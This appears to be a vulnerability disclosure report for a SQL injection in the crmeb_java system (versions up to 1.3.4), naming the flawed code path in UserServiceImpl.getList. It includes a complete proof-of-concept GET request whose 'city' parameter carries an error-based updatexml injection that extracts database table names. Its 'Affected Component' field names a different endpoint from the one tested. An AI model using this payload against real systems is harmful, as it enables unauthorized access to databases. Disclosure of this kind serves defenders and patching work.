There is a sql injection vulnerability in the crmeb_java system /api/admin/user/list

[Tyaoo]

[Suggested description]
There is a SQL Injection vulnerability in crmeb_java <=1.3.4, caused by params province and city which are in ${} format and are not strictly filtered.

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/front/spread/people

[Attack Type]
Remote

[Vulnerability details]
Send the crafted request package to the api interface /api/admin/user/list

GET /api/admin/user/list?labelId=&userType=&sex=&isPromoter=&country=foo&payCount=&accessType=0&dateLimit=&keywords=&province=&city=1'+and+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3ddatabase()),0x7e),1)%23&page=1&limit=15&level=&groupId=&temp=1678934444 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: fa1df85d14f940a1ad4c9760ba8f8f20
Origin: http://localhost:9527
Connection: close
Referer: http://localhost:9527/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

[Impact Code execution]
true

[Cause of vulnerability]
The interface /list calls the function getList.

Trace the function com/zbkj/service/service/impl/UserServiceImpl.java#getList
If the param country is not null, the params province and city will be joined directly to the addres value.

The param addres is in ${} format and it will be joined directly to the sql string.

That's all, thanks.